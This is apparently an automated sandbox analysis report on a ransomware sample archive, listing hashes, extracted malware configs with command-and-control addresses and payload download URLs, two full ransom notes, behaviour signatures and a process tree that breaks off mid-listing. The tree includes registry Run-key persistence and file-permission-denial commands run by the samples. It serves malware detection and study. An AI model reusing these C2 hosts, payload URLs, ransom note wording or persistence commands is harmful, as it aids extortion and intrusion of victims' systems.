Overview

overview

10

Static

static

1

RNSM00461.7z

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    252s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-10-2024 19:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RNSM00461.7z

  • Size

    60.9MB

  • MD5

    8c86d207106187b7b5ad016e52d56aa7

  • SHA1

    8f2a7841251a70c593971abcb07fc86b499cb450

  • SHA256

    3a53dc20e029de2cfc000807ec3514304b2d63b99ca20445ff34e601a22f6e8f

  • SHA512

    96a6cd81e09daa570a691c03f3235453db2ab73055e7f60783a654398072a78376e965c31cea033a1c5bc5be16f645a8448246f53ce886d957947ba55ab9b2e4

  • SSDEEP

    1572864:b8i7e7JhdMjviNbM9b81ht1OjO6ZJ57Iz:YNaTiNbObEOKCJ58z

Score
10/10
blackmattercrimsonratdanabotdjvunullmixerraccoonredlinesectopraturelas4@pidoras213124anioldcana01aspackv2bankerdiscoverydropperevasionexecutioninfostealerpersistencepyinstallerransomwareratspywarestealertrojanupx

Malware Config

Extracted

Family

crimsonrat

C2

173.249.22.30

Extracted

Family

danabot

Botnet

4

C2

23.229.29.48:443

152.89.247.31:443

192.210.222.81:443
Attributes
  • embedded_hash

    6AD9FE4F9E491E785665E0D144F61DAB

  • type

    loader

rsa_pubkey.plain
rsa_privkey.plain

Extracted

Family

djvu

C2

http://astdg.top/fhsgtsspen6/get.php

Attributes
  • extension

    .reqg

  • offline_id

    ioYmb0jtMMtue7xjmkS3WQWGWLR8FTQhb2giQtt1

  • payload_url

    http://securebiz.org/dl/build2.exe

    http://astdg.top/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-jTbSQT8ApY Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0324gDrgo

rsa_pubkey.plain
rsa_pubkey.plain

Extracted

Family

redline

Botnet

@pidoras213124

C2

135.181.171.9:23469

Extracted

Family

nullmixer

C2

http://razino.xyz/

Extracted

Family

redline

Botnet

Cana01

C2

176.111.174.254:56328

Extracted

Family

redline

Botnet

AniOLD

C2

akedauiver.xyz:80

Extracted

Family

urelas

C2

112.175.88.207

112.175.88.208

Extracted

Path

C:\i9Cj8fGj0.README.txt

Family

blackmatter

Ransom Note
~+ * + ' BLACK | () .-.,='``'=. - o - '=/_ \ | * | '=._ | \ `=./`, ' . '=.__.=' `=' * + Matter + O * ' . >>> What happens? Your network is encrypted, and currently not operational. We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data. >>> What guarantees? We are not a politically motivated group and we do not need anything other than your money. If you pay, we will provide you the programs for decryption and we will delete your data. If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. We always keep our promises. >>> How to contact with us? 1. Download and install TOR Browser (https://www.torproject.org/). 2. Open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/0JOA98TDMXLHJ77VDOO >>> Warning! Recovery recommendations. We strongly recommend you to do not MODIFY or REPAIR your files, that will damage them.
URLs

http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/0JOA98TDMXLHJ77VDOO

Signatures

  • BlackMatter Ransomware

    BlackMatter ransomware group claims to be Darkside and REvil succesor.

    ransomwareblackmatter
  • CrimsonRAT main payload 1 IoCs
  • CrimsonRat

    Crimson RAT is a malware linked to a Pakistani-linked threat actor.

    ratcrimsonrat
  • Danabot

    Danabot is a modular banking Trojan that has been linked with other malware.

    trojanbankerdanabot
  • Danabot Loader Component 3 IoCs
  • Detected Djvu ransomware 20 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

    ransomwaredjvu
  • NullMixer

    NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.

    droppernullmixer
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Raccoon is an infostealer written in C++ and first seen in 2019.

    stealerraccoon
  • Raccoon Stealer V1 payload 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 3 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

    trojanratsectoprat
  • SectopRAT payload 4 IoCs
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Urelas

    Urelas is a trojan targeting card games.

    trojanurelas
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Renames multiple (194) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 25 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Loads dropped DLL 32 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 16 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Looks up external IP address via web service 15 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 3 IoCs
    ransomware
  • Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
  • Suspicious use of SetThreadContext 15 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 64 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Detects Pyinstaller 1 IoCs
    pyinstaller
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 22 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 3 IoCs
    evasion
  • Modifies registry class 15 IoCs
  • Modifies registry key 1 TTPs 4 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
    ransomware
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookAW 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
    1⤵
    • Suspicious use of SetThreadContext
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    PID:532
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Modifies registry class
      PID:6772
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
    1⤵
    • Drops file in System32 directory
    PID:1100
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
    1⤵
      PID:1308
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
      1⤵
        PID:1512
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
        1⤵
          PID:1616
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
          1⤵
            PID:1720
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
            1⤵
              PID:1452
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
              1⤵
                PID:1624
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                1⤵
                  PID:2512
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                  1⤵
                    PID:2648
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                    1⤵
                    • Modifies registry class
                    PID:2708
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                    1⤵
                      PID:3204
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                      1⤵
                        PID:4892
                      • C:\Windows\system32\cmd.exe
                        cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00461.7z
                        1⤵
                        • Modifies registry class
                        PID:4664
                      • C:\Windows\system32\OpenWith.exe
                        C:\Windows\system32\OpenWith.exe -Embedding
                        1⤵
                        • Modifies registry class
                        • Suspicious use of SetWindowsHookEx
                        PID:2036
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                        1⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:1600
                        • C:\Windows\system32\cmd.exe
                          "C:\Windows\system32\cmd.exe"
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4216
                          • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.MSIL.Blocker.gen-8995d801ad73a285f2abaf20f144ac115dd17d6c0659a141b16359f7847a94d3.exe
                            HEUR-Trojan-Ransom.MSIL.Blocker.gen-8995d801ad73a285f2abaf20f144ac115dd17d6c0659a141b16359f7847a94d3.exe
                            3⤵
                            • Drops startup file
                            • Executes dropped EXE
                            • Adds Run key to start application
                            PID:4792
                          • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.MSIL.Foreign.gen-cf6472fb10e47faeef00184b1972812a5fb22410736d1b0cd541872524f7d772.exe
                            HEUR-Trojan-Ransom.MSIL.Foreign.gen-cf6472fb10e47faeef00184b1972812a5fb22410736d1b0cd541872524f7d772.exe
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2432
                          • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Blocker.gen-22d1e6ea20d6a47970b1b9d3ddb584f7c3c581cedf92f8171c105d6a8e2a6be4.exe
                            HEUR-Trojan-Ransom.Win32.Blocker.gen-22d1e6ea20d6a47970b1b9d3ddb584f7c3c581cedf92f8171c105d6a8e2a6be4.exe
                            3⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:5068
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 768
                              4⤵
                              • Program crash
                              PID:4952
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 788
                              4⤵
                              • Program crash
                              PID:652
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 796
                              4⤵
                              • Program crash
                              PID:1680
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 908
                              4⤵
                              • Program crash
                              PID:4976
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 800
                              4⤵
                              • Program crash
                              PID:4420
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 1228
                              4⤵
                              • Program crash
                              PID:1964
                          • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Blocker.gen-2a3dfad85e59e53144c3c05413e16939d8c5bf194cd00ba4e2ca4feddbcca2cb.exe
                            HEUR-Trojan-Ransom.Win32.Blocker.gen-2a3dfad85e59e53144c3c05413e16939d8c5bf194cd00ba4e2ca4feddbcca2cb.exe
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:2488
                            • C:\Windows\SysWOW64\rundll32.exe
                              C:\Windows\system32\rundll32.exe C:\Users\Admin\Desktop\00461\HEUR-T~1.TMP,S C:\Users\Admin\Desktop\00461\HEUR-T~4.EXE
                              4⤵
                              • Loads dropped DLL
                              PID:3316
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2488 -s 528
                              4⤵
                              • Program crash
                              PID:3040
                          • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Blocker.gen-4180b4199d61965dabd0718c7b63a2f88434a13926dc4ebc7122eb35a36df7ef.exe
                            HEUR-Trojan-Ransom.Win32.Blocker.gen-4180b4199d61965dabd0718c7b63a2f88434a13926dc4ebc7122eb35a36df7ef.exe
                            3⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Checks SCSI registry key(s)
                            PID:1080
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 364
                              4⤵
                              • Program crash
                              PID:2980
                          • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Blocker.pef-ed6cd1140292d182c778669b024b046eb6cc72e9d7b9dd6301f8fa13f63c62eb.exe
                            HEUR-Trojan-Ransom.Win32.Blocker.pef-ed6cd1140292d182c778669b024b046eb6cc72e9d7b9dd6301f8fa13f63c62eb.exe
                            3⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:2224
                            • C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
                              "C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"
                              4⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:3156
                          • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Convagent.gen-45733f732df30c20bdc95a802a30d1c1653661fbe6442c229f4a39cc0465ada4.exe
                            HEUR-Trojan-Ransom.Win32.Convagent.gen-45733f732df30c20bdc95a802a30d1c1653661fbe6442c229f4a39cc0465ada4.exe
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:3308
                            • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Convagent.gen-45733f732df30c20bdc95a802a30d1c1653661fbe6442c229f4a39cc0465ada4.exe
                              HEUR-Trojan-Ransom.Win32.Convagent.gen-45733f732df30c20bdc95a802a30d1c1653661fbe6442c229f4a39cc0465ada4.exe
                              4⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              • Adds Run key to start application
                              PID:1924
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Users\Admin\AppData\Local\f6d45800-cc4e-49d9-97aa-a497b922c27e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                5⤵
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:3548
                              • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Convagent.gen-45733f732df30c20bdc95a802a30d1c1653661fbe6442c229f4a39cc0465ada4.exe
                                "C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Convagent.gen-45733f732df30c20bdc95a802a30d1c1653661fbe6442c229f4a39cc0465ada4.exe" --Admin IsNotAutoStart IsNotTask
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:3896
                                • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Convagent.gen-45733f732df30c20bdc95a802a30d1c1653661fbe6442c229f4a39cc0465ada4.exe
                                  "C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Convagent.gen-45733f732df30c20bdc95a802a30d1c1653661fbe6442c229f4a39cc0465ada4.exe" --Admin IsNotAutoStart IsNotTask
                                  6⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:5432
                          • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Convagent.gen-fdf720f8e0ecddc0fb6906a6a8cb427eb3eba676c5dbae5691d9f13ae1a07ace.exe
                            HEUR-Trojan-Ransom.Win32.Convagent.gen-fdf720f8e0ecddc0fb6906a6a8cb427eb3eba676c5dbae5691d9f13ae1a07ace.exe
                            3⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:3636
                          • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-217b4673c423cfd58ea0453fb4790793ee4bfb2d0665f4beaa516fdc8ebcab0e.exe
                            HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-217b4673c423cfd58ea0453fb4790793ee4bfb2d0665f4beaa516fdc8ebcab0e.exe
                            3⤵
                            • Executes dropped EXE
                            • Drops file in Program Files directory
                            PID:4540
                          • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Generic-172cb1b8a197ddb5ae359fa7ce9874106efee0d05a495e924a6c8286e9c36af7.exe
                            HEUR-Trojan-Ransom.Win32.Generic-172cb1b8a197ddb5ae359fa7ce9874106efee0d05a495e924a6c8286e9c36af7.exe
                            3⤵
                            • Executes dropped EXE
                            PID:2316
                            • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Generic-172cb1b8a197ddb5ae359fa7ce9874106efee0d05a495e924a6c8286e9c36af7.exe
                              HEUR-Trojan-Ransom.Win32.Generic-172cb1b8a197ddb5ae359fa7ce9874106efee0d05a495e924a6c8286e9c36af7.exe
                              4⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:1304
                          • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Generic-688dc78fed9cf7ff2f911e9d7ab835baf624468b59b38672ebd3c12082ce9cfe.exe
                            HEUR-Trojan-Ransom.Win32.Generic-688dc78fed9cf7ff2f911e9d7ab835baf624468b59b38672ebd3c12082ce9cfe.exe
                            3⤵
                            • Executes dropped EXE
                            • Sets desktop wallpaper using registry
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4528
                          • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Generic-abd3add9774fe7ab00a10ed781438c2602ee836c2d45f3a310965b1eeb8b5529.exe
                            HEUR-Trojan-Ransom.Win32.Generic-abd3add9774fe7ab00a10ed781438c2602ee836c2d45f3a310965b1eeb8b5529.exe
                            3⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:3216
                            • C:\Users\Admin\AppData\Roaming\Objetos.exe
                              "C:\Users\Admin\AppData\Roaming\Objetos.exe" C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Generic-abd3add9774fe7ab00a10ed781438c2602ee836c2d45f3a310965b1eeb8b5529.exe
                              4⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Modifies registry class
                              • Suspicious use of WriteProcessMemory
                              PID:1828
                              • C:\Users\Admin\AppData\Roaming\Windows Objects\wmiintegrator.exe
                                "C:\Users\Admin\AppData\Roaming\Windows Objects\wmiintegrator.exe" unk
                                5⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:3412
                                • C:\Users\Admin\AppData\Roaming\Windows Objects\wmihostwin.exe
                                  "C:\Users\Admin\AppData\Roaming\Windows Objects\wmihostwin.exe" unk2
                                  6⤵
                                  • Executes dropped EXE
                                  PID:1956
                                  • C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe
                                    "C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe" unk3
                                    7⤵
                                    • Executes dropped EXE
                                    PID:2388
                                    • C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure.exe
                                      "C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure.exe" execute
                                      8⤵
                                      • Executes dropped EXE
                                      PID:2220
                                    • C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure64.exe
                                      "C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure64.exe" autorun
                                      8⤵
                                      • Checks computer location settings
                                      • Executes dropped EXE
                                      PID:1208
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                        9⤵
                                        • Adds Run key to start application
                                        • System Location Discovery: System Language Discovery
                                        PID:5496
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                        9⤵
                                        • Adds Run key to start application
                                        • System Location Discovery: System Language Discovery
                                        PID:2560
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                        9⤵
                                        • Adds Run key to start application
                                        • System Location Discovery: System Language Discovery
                                        PID:5268
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                        9⤵
                                        • Adds Run key to start application
                                        • System Location Discovery: System Language Discovery
                                        PID:5116
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                        9⤵
                                        • Adds Run key to start application
                                        PID:1544
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                        9⤵
                                        • Adds Run key to start application
                                        PID:6384
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                        9⤵
                                        • Adds Run key to start application
                                        • System Location Discovery: System Language Discovery
                                        PID:8404
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                        9⤵
                                        • Adds Run key to start application
                                        • System Location Discovery: System Language Discovery
                                        PID:7636
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                        9⤵
                                        • Adds Run key to start application
                                        PID:8916
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                        9⤵
                                        • Adds Run key to start application
                                        • System Location Discovery: System Language Discovery
                                        PID:7740
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                        9⤵
                                        • Adds Run key to start application
                                        PID:6056
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                        9⤵
                                          PID:7900
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                          9⤵
                                            PID:8908
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                            9⤵
                                              PID:2528
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                              9⤵
                                                PID:8880
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                9⤵
                                                  PID:8084
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                  9⤵
                                                    PID:6476
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                    9⤵
                                                      PID:7952
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                      9⤵
                                                        PID:5444
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                        9⤵
                                                          PID:6088
                                                        • C:\Windows\SysWOW64\reg.exe
